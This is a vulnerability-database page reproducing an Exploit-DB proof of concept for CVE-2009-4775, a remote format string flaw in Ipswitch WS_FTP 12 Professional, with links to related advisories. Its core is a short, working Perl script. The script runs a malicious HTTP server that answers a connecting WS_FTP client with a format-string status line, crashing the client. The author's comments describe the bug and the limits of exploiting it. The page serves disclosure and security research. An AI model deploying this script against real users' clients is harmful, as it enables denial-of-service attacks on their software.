Lucene search
+L

Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)

🗓️ 09 Sep 2009 00:00:00Reported by Jeremy BrownType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

Ipswitch WS_FTP 12 Professional Remote Format String (PoC

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-4775
9 Sep 200900:00
circl
CVE
CVE-2009-4775
21 Apr 201014:00
cve
Cvelist
CVE-2009-4775
21 Apr 201014:00
cvelist
Kaspersky
KLA10225 DoS vulnerability in WS FTP
21 Apr 201000:00
kaspersky
NVD
CVE-2009-4775
21 Apr 201014:30
nvd
OpenVAS
Ipswitch WS_FTP Professional < 12.2 'HTTP' Response Format String Vulnerability
23 Apr 201000:00
openvas
OpenVAS
Ipswitch WS_FTP Professional 'HTTP' Response Format String Vulnerability
23 Apr 201000:00
openvas
Prion
Format string
21 Apr 201014:30
prion
Tenable Nessus
WS_FTP Pro HTTP Server Response Format String
18 Jan 201000:00
nessus
#!/usr/bin/perl
# nocoolnameforawsftppoc.pl
# AKA
# Ipswitch WS_FTP 12 Professional Remote Format String 0day PoC
#
# Jeremy Brown [[email protected]//jbrownsec.blogspot.com//krakowlabs.com] 09.07.2009
#
# *********************************************************************************************************
# I really _hate_ releasing proof of concepts. ASCII gets itchy after a few months. And it has been over a
# year since a WS_FTP exploit/PoC has been on milw0rm (as far as I know) (!). Crazy right? This bug was
# found with Hzzp, yes WS_FTP parses HTTP too. Format string in the status code, bang bang. But the problem
# is we can't seem to be able to use %n, which I believe is disabled by default per Microsoft, making
# exploitation more difficult. Hrm. And where is a security contact for Ipswitch? I believe I did try to
# find a reasonable resource. Maybe Ipswitch should just fuzz their products with Hzzp? xD Happy Holidays!
# **********************************************************************************************************
# nocoolnameforawsftppoc.pl

use IO::Socket;

$port    = 80;
$payload = "HTTP/1.1 %s%s\r\n\r\n";

$serv = IO::Socket::INET->new(Proto=>'tcp', LocalPort=>$port, Listen=>1) or die "Error: listen($port)\n";

$cli = $serv->accept() or die "Error: accept()\n";

$cli->recv($buf, 512);
$cli->send($payload);

close($cli);
close($serv);

# milw0rm.com [2009-09-09]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Sep 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.05608
41